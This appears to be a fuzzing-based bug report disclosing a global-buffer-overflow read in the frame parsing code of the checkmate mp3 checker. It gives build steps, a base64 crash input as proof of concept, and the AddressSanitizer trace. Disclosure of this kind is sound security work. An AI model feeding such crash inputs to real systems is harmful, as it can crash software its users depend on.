Classic Buffer Overflow in sjord/checkmate
Oct 4th 2021
Good morning, I hope this message finds you well during these challenging times. Whilst testing checkmate built from commit
8e497d8, we discovered crafted input which triggers a bug in the frame parsing code, leading to a global-buffer-overflow, READ of size 4.
Proof of Concept
git clone https://github.com/Sjord/checkmate LD=lld AS=llvm-as AR=llvm-ar RANLIB=llvm-ranlib CC=clang CXX=clang++ CFLAGS="-fsanitize=address" CXXFLAGS="-fsanitize=address" LDFLAGS="-fsanitize=address" ./configure make
echo "////MA==" | base64 -d > /tmp/crash0000.fuzz ./mpck -v -x /tmp/crash0000.fuzz
==17016==ERROR: AddressSanitizer: global-buffer-overflow on address 0x000000231804 at pc 0x00000030f290 bp 0x7ffffe05aeb0 sp 0x7ffffe05aea8 READ of size 4 at 0x000000231804 thread T0 #0 0x30f28f in parseframe /root/checkmate/mpck/checkframe.c:132:19 #1 0x30f28f in findframe /root/checkmate/mpck/checkframe.c:212:5 #2 0x309b3a in findlastframe /root/checkmate/mpck/checkfile.c:102:9 #3 0x309b3a in checkfile /root/checkmate/mpck/checkfile.c:144:2 #4 0x305ffa in checkargument /root/checkmate/mpck/checkarguments.c:83:9 #5 0x312cfb in checkarguments /root/checkmate/mpck/checkarguments.c:256:13 #6 0x312cfb in main /root/checkmate/mpck/main.c:167:15 #7 0x7fd0868460b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16 #8 0x25500d in _start (/root/checkmate/mpck/mpck+0x25500d) 0x000000231804 is located 60 bytes to the left of global variable '<string literal>' defined in 'checkframe.c:145:31' (0x231840) of size 15 '<string literal>' is ascii string 'CRC read error' 0x000000231804 is located 0 bytes to the right of global variable 'samplerate_matrix' defined in './matrices.h:43:12' (0x2317e0) of size 36 SUMMARY: AddressSanitizer: global-buffer-overflow /root/checkmate/mpck/checkframe.c:132:19 in parseframe
A buffer overflow condition exists when a program attempts to put more data in a buffer than it can hold or when a program attempts to put data in a memory area past a buffer. In this case, a buffer is a sequential section of memory allocated to contain anything from a character string to an array of integers. Writing outside the bounds of a block of allocated memory can corrupt data, crash the program, or cause the execution of malicious code.